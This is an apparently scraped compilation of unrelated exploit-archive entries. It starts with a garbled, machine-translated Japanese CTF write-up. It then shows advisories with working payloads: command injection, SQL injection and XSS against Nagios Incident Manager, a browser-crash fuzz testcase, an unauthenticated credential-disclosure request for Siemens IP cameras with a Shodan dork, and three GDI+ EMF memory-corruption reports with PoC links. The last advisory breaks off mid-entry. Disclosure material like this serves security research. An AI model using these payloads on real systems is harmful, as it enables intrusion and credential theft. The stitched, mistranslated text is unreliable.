
:

する

file=$(ls -t | tail -1)

pass=$(zipinfo $ file | grep- | cut -d '' -f12 | cut-d。-f1)

unzip -p $ pass $ファイル

echo 'unzip -p $ pass $ file'

mv $ file ./files

終わり

最後のレイヤーは233333です。6桁の数値パスワードは756698です

SQLiteを開いて、従業員のテーブルに旗を見つけます

フラグ{UNZ1P_I5_SO_C00L ##}

問題解決スクリプト

web

難易度媒体

9フラグ

ヒトの肉の並べ替え、次に精神的にBase64を計算します

解決策1

および他のWebサイトには十分な出力があり、コピーしてから、ほとんどのテキストエディターがサポートする検索/交換関数を使用して、メッセージを次のような形式に置き換えます。

a=list( 'a' * 20)

.

a [1]='a'

a [20]='b'

a [3]='c'

.

# やっと

base64をインポートします

print(base64.b64decode( ''。(a)))

解決策2

質問SSEはリアルタイムでメッセージをブラウザにプッシュします。ルートは「/フラグ」です。

インポートBase6

HireHackking 
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Nagios Incident Manager Multiple Vulnerabilities
Affected versions: Nagios Incident Manager <= 2.0.0

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf

+-----------+
|Description|
+-----------+
The Nagios Incident Manager application is vulnerable to multiple
vulnerabilities, including remote code execution via command injection,
SQL injection and stored cross-site scripting.


+------------+
|Exploitation|
+------------+
==Command Injection==
Multiple command injection vulnerabilities exist within the incident
report file generation functionality as user input is passed to system
shell calls without validation. A limited non-administrative user, who
by default does not have permissions to add custom MIME types for
incident file attachments, can exploit these vulnerabilities to obtain
remote code execution on the Incident Manager system as the ‘apache’ user.

URL => /nagiosim/reports/download/<pdf|jpg>/mttr/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download/<pdf|jpg>/closed/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download/<pdf|jpg>/first_response/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download/<pdf|jpg>/general/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo


==SQL Injection==
The Nagios IM admin functionality to update the application settings is
vulnerable to an SQL Injection vulnerability via error-based payloads.
An attacker can inject into the ‘timezone’ POST parameter and retrieve
sensitive information from the application MySQL database.

URL => /nagiosim/admin/settings
Method => POST
Parameter => timezone
Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '


==Stored Cross-Site Scripting==
Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
web interface, allowing a standard user to insert malicious JavaScript
payloads into administrative and non-administrative application
functionality. This attack vector could be used by an authenticated
attacker with standard user privileges to hijack the session of an admin
user and extend their permissions within the application (e.g. adding
PHP as a valid MIME type for file attachments).

URL => /nagiosim/incidents/add
Method => POST
Parameters => title, summary, priority, file_description, status
Render => /nagiosim/incidents, /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>

URL => /nagiosim/api/incidents/<ID>/messages
Method => POST
Parameters => title
Render => /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>

URL => /nagiosim/profile
Method => POST
Parameters => username, first_name, last_name
Render => /nagiosim/admin/users, Global Menu Banner (username)
POC Payload => <script>alert(1)</script>

+----------+
| Solution |
+----------+
Upgrade to Nagios Incident Manager 2.0.1


+------------+
|  Timeline  |
+------------+
2/06/2016 - Initial disclosure to vendor
3/06/2016 - Vendor acknowledges receipt of advisory
8/07/2016 - Vendor releases patched software version (2.0.1)
11/08/2016 – Public disclosure



+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
-->

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">
HireHackking 
1. Advisory Information
========================================
Title                   : SIEMENS IP-Camera Unauthenticated Remote Credentials Disclosure
Vendor Homepage         : https://www.siemens.com
Remotely Exploitable	: Yes
Versions Affected       : x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
Tested on Camera types	: CVMS2025-IR, CCMS2025 (Camera type)
Reference for CCMS2025  : https://w5.siemens.com/web/cz/cz/corporate/portal/home/produkty_a_sluzby/IBT/pozarni_a_bezpecnostni_systemy/cctv/ip_kamery/Documents/023_CCIS1425_A6V10333969_en.doc.pdf
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : title:"SIEMENS IP-Camera"
Date                    : 16/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
  

3. Description
========================================
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.


4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 


Request:
----------
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
Host: host:port
Connection: close


Response:
----------
HTTP/1.0 200 OK
Connection: close
Content-type: text/html

var Adm_ID="admin";
var Adm_Pass1=“admin”;
var Adm_Pass2=“admin”;
var Language=“en”;
var Logoff_Time="0";



Login @ http://host:port/cgi-bin/chklogin.cgi


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=824

The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc. The GDI+ implementation supports bitmaps compressed with the BI_RLE8 (8-bit Run-Length Encoding) compression algorithm, and performs the actual decompression in the gdiplus!DecodeCompressedRLEBitmap function.

In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):

columns = abs(biHeight)
bytes_per_row = abs(biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8))

The output buffer used to store the decompressed bitmap is allocated from the heap and has a size of columns * bytes_per_row, which means the bitmap has a high degree of control over the buffer's length. One of the supported RLE escape codes is "End of Line", implemented as follows:

  --- cut ---
  out_ptr += bytes_per_row;
  if (out_ptr > output_buffer_end) {
    // Bail out.
  }
  --- cut ---

The above construct seems correct at a first glance, and indeed works fine on 64-bit platforms. However, in 32-bit Large Address Aware programs which can utilize the full 32-bit address space, the "out_ptr += bytes_per_row" expression may overflow the upper address space bound (0xFFFFFFFF), which will subsequently make the "out_ptr" pointer contain a completely invalid address, while still passing the "out_ptr > output_buffer_end" sanity check.

Here's an example:

  biWidth    = 0x05900000
  biHeight   = 0x00000017
  biPlanes   = 0x0001
  biBitCount = 0x0008

As a result, columns = 0x17, bytes_per_row = 0x590000 and the output buffer size is 0x7ff00000. In my test application, the buffer is allocated at address 0x7fff0020, and it ends at 0xffef0020. If we then encode the bitmap as:

  End of Line \
  End of Line |
  End of Line | 24 times
  ...         |
  End of Line /
  Repeat the 0xcc bytes 255 times.

Or in binary:

  000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFCC

Then the out_ptr pointer will change as follows:

  7fff0020
  858f0020
  8b1f0020
  ...
  ffef0020
  057f0020

As you can see, the address has passed the sanity checks at all stages, and now that it is out of the allocation's bounds, an attempt to write any data will result in a crash:

  --- cut ---
  (3434.194): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=0011015e ebx=ffef0020 ecx=000000fe edx=057f01cc esi=057f0020 edi=0011a6f0
  eip=6b090e5a esp=0037f290 ebp=0037f2ac iopl=0         nv up ei pl nz na pe cy
  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
  gdiplus!DecodeCompressedRLEBitmap+0x195:
  6b090e5a 8816            mov     byte ptr [esi],dl          ds:002b:057f0020=??
  0:000> ? dl
  Evaluate expression: 204 = 000000cc
  0:000> kb
  ChildEBP RetAddr  Args to Child              
  0037f2ac 6b091124 057f0020 cc11012c 0037f2cc gdiplus!DecodeCompressedRLEBitmap+0x195
  0037f6f4 6b092c7a 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x96
  0037f708 6b0932cc 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::Create+0x23
  0037f720 6b0c1e8b 001100f8 0011012c 00000000 gdiplus!GpBitmap::GpBitmap+0x32
  0037f804 6b0c7ed1 0000004f 00143a30 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x92
  0037f818 6b0986ca 0000004f 0000a67c 00110074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
  0037f834 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
  0037f85c 773955ec 472127aa 0047d798 00110074 gdiplus!EnumEmfDownLevel+0x6e
  0037f8e8 6b09aa36 472127aa 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
  0037f920 6b09d199 472127aa 54461fd1 0137f98c gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
  0037f9c8 6b09f455 00000000 54461fd1 0037faf0 gdiplus!GpGraphics::EnumEmf+0x391
  0037fb28 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
  0037fc24 6b0a47c6 00143228 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
  0037fc88 6b09c792 00143228 0037fcfc 0037fcfc gdiplus!GpGraphics::DrawImage+0x51
  0037fcc0 6b09ea7a 00143228 0037fcfc 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
  0037fd14 6b09f4d5 00142f10 0037fda0 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
  0037fd38 6b074f71 00142f10 0037fda0 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
  0037fd74 0118117e 00142f10 00143228 0037fda0 gdiplus!GdipConvertToEmfPlus+0xbf
  ...
  --- cut ---

The issue has been reproduced with a C++ program built with Microsoft Visual Studio 2013 for the x86 platform and with the /LARGEADDRESSAWARE flag set, which boils down to the following code:

  --- cut ---
  Graphics graphics(hdc);
  Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");

  INT conversionSuccess;
  mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
  --- cut ---

The poc.emf file is attached. The reproducibility of the crash using the specific testcase is obviously highly dependent on the state of the process address space while loading the image, so poc.emf might not necessarily lead to a crash of a GDI+ client other than the test program (such as Microsoft Office).

The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40255.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=826


The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc.

In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):

columns = abs(biHeight)
bytes_per_row_signed = biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8)

While the gdiplus!ValidateBitmapInfo attempts to validate the correctness of the bitmap headers to some degree, it also fills out portions of a structure which is later used to display the bitmap or perform any other operations on the image. One of them is a pointer to the first row of pixels, calculated depending on the signedness of the biHeight field, which indicates if the bitmap is encoded upside-down or not. This is illustrated by the following pseudo-code snippet:

  --- cut ---
  if (biHeight > 0) {
    first_row = &pixels_buffer[bytes_per_row_signed * (biHeight - 1)];
  } else {
    first_row = pixels_buffer;
  }
  --- cut ---

Even though there are some dependencies between the various fields that must be met, the attacker still has almost full control over the values of both bytes_per_row_signed and biHeight. If the bytes_per_row_signed variable holds a negative value and biHeight is larger than 1, then we can get the first_row pointer to point at a nearly arbitrary location relative to the address of pixels_buffer.

The exploitation of this bug is additionally facilitated by a flaw in the gdiplus!GetBitmapFromRecord function, which is supposed to check that the EMF record is sufficiently large to fully contain the bitmap data, and is called at the beginning of the BMP-related EMF record handlers, before any BMP parsing actually takes place. The most interesting expression is as follows:

  --- cut ---
  if (record_length - bitmap_data_offset >= GetDibBitsSize(&header)) {
    return TRUE;
  }
  return FALSE;
  --- cut ---

The above check appears to be effective at a first glance, but it turns out that the GetDibBitsSize() function returns 0 if there are any problems detected in the headers, including invalid values in specific fields (biWidth, biHeight, ...), integer overflows etc. As a result, contrary to intuition, a malformed header will cause the above check to automatically pass, opening up the potential for bugs such as the one discussed in this report further in the bitmap handling code.

A poc.emf file is attached. It has been confirmed to crash both x86 and x64 builds of a test EMF viewer written in C++, and Microsoft Office 2013. It uses an EMR_PLGBLT record with a malformed, embedded bitmap and the following fields:

  biWidth    = 0x30000000
  biHeight   = 0x00000002
  biPlanes   = 0x0001
  biBitCount = 0x0008

The above combination of values will lead to GetDibBitsSize() returning 0, bytes_per_row_signed holding a negative value, and the first_row pointer addressing an invalid address lower than the actual buffer:

  --- cut ---
  (4144.1e30): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=f046faf4 ebx=0000fdec ecx=00003e72 edx=00000000 esi=f046012c edi=07c7d624
  eip=75969b60 esp=0034ec88 ebp=0034ec90 iopl=0         nv up ei pl nz ac pe nc
  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210216
  msvcrt!memcpy+0x5a:
  75969b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
  0:000> kb
  ChildEBP RetAddr  Args to Child              
  0034ec90 6b0a5bd3 07c7d624 f046012c 0000f9c8 msvcrt!memcpy+0x5a
  0034ecb0 6b09780d 07c7d1e0 f046012c 20000000 gdiplus!EmfPlusCommentStream::Write+0x9e
  0034f584 6b098180 07c7d1e0 00000002 08be4cd8 gdiplus!CopyOnWriteBitmap::GetData+0x3f3
  0034f59c 6b0a6029 07c7d1e0 00000002 08be4cd8 gdiplus!GpBitmap::GetData+0x1c
  0034f5b4 6b0a8a55 00000005 08be4cd8 00000000 gdiplus!MetafileRecorder::WriteObject+0x49
  0034f5d8 6b0a7814 07c7badc 0034f730 07c90d28 gdiplus!MetafileRecorder::RecordObject+0x57
  0034f720 6b0a453d 0034f7f8 08be4cd8 00000000 gdiplus!MetafileRecorder::RecordDrawImage+0x93
  0034f818 6b0a4838 08be4cd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x1f0
  0034f87c 6b0c205d 08be4cd8 0034f918 00000003 gdiplus!GpGraphics::DrawImage+0x66
  0034f96c 6b0c7ed1 0000004f 07c94cb0 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x264
  0034f980 6b0986ca 0000004f 0000a67c 00460074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
  0034f99c 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
  0034f9c4 773955ec 7021208b 05d56ff8 00460074 gdiplus!EnumEmfDownLevel+0x6e
  0034fa50 6b09aa36 7021208b 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
  0034fa88 6b09d199 7021208b 5e461f1b 0134faf4 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
  0034fb30 6b09f455 00000000 5e461f1b 0034fc58 gdiplus!GpGraphics::EnumEmf+0x391
  0034fc90 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
  0034fd8c 6b0a47c6 07c75f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
  0034fdf0 6b09c792 07c75f28 0034fe64 0034fe64 gdiplus!GpGraphics::DrawImage+0x51
  0034fe28 6b09ea7a 07c75f28 0034fe64 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
  0034fe7c 6b09f4d5 07c71d28 0034ff08 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
  0034fea0 6b074f71 07c71d28 0034ff08 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
  0034fedc 010c117e 07c71d28 07c75f28 0034ff08 gdiplus!GdipConvertToEmfPlus+0xbf
  ...
  --- cut ---

The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40256.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=828

The Microsoft GDI+ implementation of the EMF format supports records corresponding to the ExtTextOutA() and PolyTextOutA() API functions. Both CEmfPlusEnumState::ExtTextOutA and CEmfPlusEnumState::PolyTextOutA handlers suffer from a security vulnerability in the handling of the "offDx" record field, which is described in the following way in the format specification:

  --- cut ---
  offDx (4 bytes): A 32-bit unsigned integer that specifies the offset to an intercharacter spacing
  array, in bytes, from the start of the record in which this object is contained. This value MUST be
  32-bit aligned.
  --- cut ---

The offset is supposed to address an array of "Chars" (another field in the text records, specifying the number of characters to be displayed) double words, taking up a total of 4 * N bytes. However, instead of verifying that the provided record is sufficiently large to contain 4 * N bytes at the specified offset, it only checks if it can fit 4 bytes (completely ignoring the actual number of characters in the message, which can be larger than 1). A pseudo-code of the current, vulnerable code is shown below:

  --- cut ---
  if ( record_size - offString >= nChars && (!nChars || record_size - 4 >= record->emrtext.offDx) ) {
    // Validation passed, continue processing the record.
  }
  --- cut ---

There is definitely a flaw in the implementation, but one which would typically only lead to an out-of-bound read condition, since it's a problem with the sanitization of an input buffer. However, the logic found in the remainder of the function is as follows:

- Attempt to convert the textual ANSI string in the record to a wide-char string, using the MultiByteToWideChar() function and the code page specified in the most recently selected font.
  - If the number of characters converted is equal to the number of bytes in the input buffer, CEmfPlusEnumState::PlayExtTextOut() is called and the function returns.
  - Otherwise, the function proceeds to rewrite the offDx buffer by calling EmfEnumState::CreateCopyOfCurrentRecord() to allocate an exact copy of the current record (with the same size), and then copying entries of the intercharacter spacing array, omitting those corresponding to bytes which cause the IsDBCSLeadByteEx() function to return true. Once the rewriting is performed, CEmfPlusEnumState::PlayExtTextOut() is called with the new record as the parameter.

In order to trigger the more interesting array rewriting behavior, we must get the MultiByteToWideChar() function to convert fewer characters than there are bytes in the input buffer, which means we have to utilize a string in a non-standard encoding, which supports double-byte character sets (DBCS). Luckily, this is possible by selecting a font with an appropriate charset (e.g. SHIFTJIS_CHARSET) into the HDC, and invoking either of the *TextOutA() handlers with a byte stream containing so-called lead bytes (which folds two bytes into a single character, decreasing the eventual return value of the MultiByteToWideChar() call).

Since the spacing array in the new record is too small to store entries for all "Chars" characters, it is overflown with data read from memory after the original record buffer. Considering the complexity of the EMF format, other records in the picture file could be easily used to massage the heap such that the record copy is overflown with fully controlled data. The issue has been reproduced in Microsoft Office 2013, as well as a simple C++ program which boils down to the following calls:

  --- cut ---
  Graphics graphics(hdc);
  Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");

  INT conversionSuccess;
  mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
  --- cut ---

An example crash log from PowerPoint 2013, indicating heap corruption, is shown below (the condition can also be reproduced reliably by enabling Page Heap on the GDI+ client process):

  --- cut ---
  (2a8c.2bd8): Break instruction exception - code 80000003 (first chance)
  eax=00000000 ebx=00000000 ecx=772336ab edx=0022cb85 esi=03bd0000 edi=1171ffc0
  eip=7728e815 esp=0022cdd8 ebp=0022ce50 iopl=0         nv up ei pl nz na pe nc
  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
  ntdll!RtlReportCriticalFailure+0x29:
  7728e815 cc              int     3
  0:000> kb
  ChildEBP RetAddr  Args to Child              
  0022ce50 7728f749 c0000374 772c4270 0022ce94 ntdll!RtlReportCriticalFailure+0x29
  0022ce60 7728f829 00000002 64dc1326 03bd0000 ntdll!RtlpReportHeapFailure+0x21
  0022ce94 7724ab46 0000000c 03bd0000 1171ffc0 ntdll!RtlpLogHeapFailure+0xa1
  0022cf84 771f3431 00000258 00000260 03bd00c4 ntdll!RtlpAllocateHeap+0x7b2
  0022d008 695071ec 03bd0000 00000000 00000258 ntdll!RtlAllocateHeap+0x23a
  0022d01c 6951bbf1 00000258 116b5104 03bdd558 gdiplus!GpMalloc+0x16
  0022d030 69557185 116b50e0 116b50e0 03bdd558 gdiplus!GpGraphics::Save+0x11
  0022d4b0 69557bdc 116b50e0 116b5104 116b30d8 gdiplus!CEmfPlusEnumState::PlayExtTextOut+0xda
  0022d4ec 69557f25 00000053 03bdae00 00006044 gdiplus!CEmfPlusEnumState::ExtTextOutA+0x136
  0022d500 695286ca 00000053 00006044 0d67b568 gdiplus!CEmfPlusEnumState::ProcessRecord+0x13b
  0022d51c 69528862 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
  0022d544 768155f4 9d211b17 0d567180 0d67b568 gdiplus!EnumEmfDownLevel+0x6e
  0022d5d0 6952aa36 9d211b17 403581b3 695287f4 GDI32!bInternalPlayEMF+0x6a3
  0022d608 6952d199 9d211b17 05462305 0122d674 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
  0022d6b0 6952f455 00000000 05462305 0022d7d8 gdiplus!GpGraphics::EnumEmf+0x391
  0022d810 69534742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
  0022d90c 695347c6 03bd2fd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
  0022d970 6952c792 03bd2fd8 0022d9e4 0022d9e4 gdiplus!GpGraphics::DrawImage+0x51
  0022d9a8 6952ea7a 03bd2fd8 0022d9e4 00000004 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
  0022d9fc 6952f4d5 03bdc438 0022dadc 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
  0022da20 69504f71 03bdc438 0022dadc 00000004 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
  0022da5c 54793044 03bdc438 03bd2fd8 0022dadc gdiplus!GdipConvertToEmfPlus+0xbf
  WARNING: Stack unwind information not available. Following frames may be wrong.
  0022daf0 548c7b8d 00000000 03bdc438 b93aea31 oart!Ordinal3385+0x7e8
  0022df18 548c749b 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x874
  0022e12c 54793cbb 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x182
  0022e1c0 546bf722 0022e3a4 094c4380 00000000 oart!Ordinal5891+0xad1
  0022e200 5474987d 0022e3a4 0d4f7f34 0022e2ec oart!Ordinal3910+0xfd6
  0022e214 546bf6b4 0022e3a4 b93ad771 0d4f7f34 oart!Ordinal10880+0x98
  0022e258 546beea2 1c0e82b0 b93ad1a5 0d2bce4c oart!Ordinal3910+0xf68
  0022e48c 546be7e4 0022e968 0022ed6c 00000002 oart!Ordinal3910+0x756
  0022e550 546be4d3 0d2bce48 0022e964 09661440 oart!Ordinal3910+0x98
  0022e574 546be440 0022e968 00000002 0022e9b8 oart!Ordinal8924+0xaf
  0022e598 546be3aa 0022e968 00000002 0022e9b8 oart!Ordinal8924+0x1c
  0022e728 546bc00d 0d83a888 00000000 00000000 oart!Ordinal5363+0x261
  0022e784 5474c3c6 00000000 00000000 0d43e458 oart!Ordinal8822+0x20
  0022e894 5474c224 0022e964 0022eaa0 00000000 oart!Ordinal5408+0x4f1
  0022ea64 5474bff6 0d371f40 0022eaa0 00000000 oart!Ordinal5408+0x34f
  0022eb28 54749818 0d371f40 0022ebac 0022eb4c oart!Ordinal5408+0x121
  0022eb5c 5473ea78 0d371f40 0022ebac 00000000 oart!Ordinal10880+0x33
  0022ed0c 54741fc8 0d371f40 0022ef28 00000000 oart!Ordinal1852+0x241
  0022ed44 547425e5 0d371f40 0022ef28 00000000 oart!Ordinal2425+0x5ea
  0022ef6c 54743796 0d1a15a0 00000000 0022f34c oart!Ordinal2425+0xc07
  0022f0e4 54741d5c 0022f1f0 0473c1ab 3feab68a oart!Ordinal2081+0x292
  0022f210 547439d6 0022f2d0 0473c1ab 3feab68a oart!Ordinal2425+0x37e
  0022f268 554ecfaa 0022f2d0 0473c1ab 3feab68a oart!Ordinal8518+0xb6
  0022f380 554edbd7 b93ac69d 0d3d99bc 0d3d9998 ppcore!PPMain+0x74eff
  0022f3b4 554edba9 55497d99 0022f3df b93ac6d9 ppcore!PPMain+0x75b2c
  0022f3f0 55497d5a 0022f428 0fabe376 0d3d99b8 ppcore!PPMain+0x75afe
  0022f3f8 0fabe376 0d3d99b8 0d184d04 0fabe203 ppcore!PPMain+0x1fcaf
  0022f428 0fabd28d 003f9a38 003f7e00 003ff518 mso!Ordinal8295+0x22d
  0022f440 0fbd483a 003f9a38 01a81a32 003ff608 mso!Ordinal4996+0x12b
  0022f478 0fbd476e 00000001 003ff608 003f7d5c mso!Ordinal3599+0xaf
  0022f4d0 0fbce774 003f7d5c 00000000 003f7e9c mso!Ordinal9018+0x334
  0022f4ec 0fbcc03c 00000000 0022f55c 00000100 mso!Ordinal8480+0x29d
  0022f500 0fbcbf08 003f7e9c 0022f528 5549d3f5 mso!Ordinal4921+0x4c1
  0022f50c 5549d3f5 03cd02a0 ffffffff 5549d38b mso!Ordinal4921+0x38d
  0022f528 5549d26c 0022f55c 00000001 00000000 ppcore!PPMain+0x2534a
  0022f540 5549d238 0022f55c b93ac2b5 01033034 ppcore!PPMain+0x251c1
  0022f79c 554780fc 0022f7b8 b93acd25 01033034 ppcore!PPMain+0x2518d
  0022f80c 01031572 00312c8c 0022f8ac 0103154a ppcore!PPMain+0x51
  0022f818 0103154a 01030000 00000000 00312c8c POWERPNT+0x1572
  0022f8ac 76a5338a fffde000 0022f8f8 771f9902 POWERPNT+0x154a
  0022f8b8 771f9902 fffde000 64dc254a 00000000 kernel32!BaseThreadInitThunk+0xe
  0022f8f8 771f98d5 010312bb fffde000 ffffffff ntdll!__RtlUserThreadStart+0x70
  0022f910 00000000 010312bb fffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
  --- cut ---

The poc.emf file is attached.

The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40257.zip
HireHackking 
1. Advisory Information
========================================
Title                   : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure
Vendor Homepage         : https://is.spiap.com/
Remotely Exploitable	: Yes
Tested on Camera types	: CCPW3025-IR , CVMW3025-IR
Product References      : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html
+                       : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : title:"Vanderbilt IP-Camera"
Date                    : 19/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
  

3. Description
========================================
